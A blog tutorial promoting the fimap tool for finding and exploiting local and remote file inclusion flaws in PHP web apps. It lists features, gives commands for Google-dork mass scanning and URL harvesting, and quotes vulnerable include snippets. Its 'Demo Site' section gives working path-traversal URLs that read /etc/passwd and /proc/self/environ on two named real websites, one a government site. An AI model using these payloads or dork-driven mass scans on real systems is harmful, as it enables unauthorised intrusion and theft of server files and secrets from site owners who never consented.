Hi everyone this is a one more post on web scanner that is actually best on its Business For LFI (Local File Inclusion) And Remote File Inclusion .Though there are various tools available on backtrack but
Fimap is one of the finest tool for detecting LFI and RFI on target website and exploiting it.
About Fimap Tool
It is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap is another tool which is best for getting LFI and RFI Out of a web app.it is still under development but works very fine.
Features and Functions
Automatically find the root of the file system
Detect default files outside of the web folder
Attempts to detect passwords inside the files
Supports basic authentication
Can use null byte to bypass some controls
Writes a report of the scan to a file
Add your own payloads and patches to the config.py file.
Has a Harvest mode which can collect URLs from a given domain for later pentesting.
All commands will now be send base64 encoded. So you can use quotes as much as you want.
php://input detection is now 100% reliable.
You can now define a POST string for relative and absolute files in the config.py.
TTL implemented. You can define it with “—ttl “. Default is 30 seconds.
Experimental HTTP Proxy support. You can define a HTTP(s) proxy with “—http-proxy localhost:8080″.
Googlescanner can now skip the first X pages. Use “—skip-pages X”.
Lots of bugfixes and additional regular expressions.
Harvest mode which can collect URLs from a given domain for later pentesting.
Can handle directories in RFI mode like:
<*? include (*$*_GET["inc"] . "/content/index.html"); *?**>
<***? include (*$*_GET["inc"] . "_lang/index.html"); *?**>
(Remove * symbol)
where Null-Byte is not possible.
You always define absolute path names in the configs. No monkey like redundant pathes like:
../etc/passwd
../../etc/passwd
../../../etc/passwd
Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode
Test and exploit multiple bugs:
include()
include_once()
require()
require_once()
Working With Fimap
Scan a single URL for FI errors
#./fimap -u http://www.example.com/test.php?file=bang&id=23
Scan Google search results for FI errors
#./fimap.py -g -q inurl:index.php
Harvest all links of a webpage
#./fimap.py –H -u http://example.com–d 3 –w /tmp/urllist
-m is for mass scanning
-l is for list
Scan websites using google dorks
.fimap.py -g -q ‘inurl:index.php’
-g for searching from google
-q stands for the query which is to be searched in google.
Requirements
Needs: Python >= 2.4
Download
Click Here
Demo Site:
Vuln Check1 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Vuln Check2 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ
Exmp 2 := http://www.aladde.org/index.php?load=../../../../../../../../../../../../../../proc/self/environ
Hope you like this tutorial don't forget to leave your valuable comment thank You :)
Post a Comment
Post a Comment
Feel Free To Ask Your Query we Love To Answer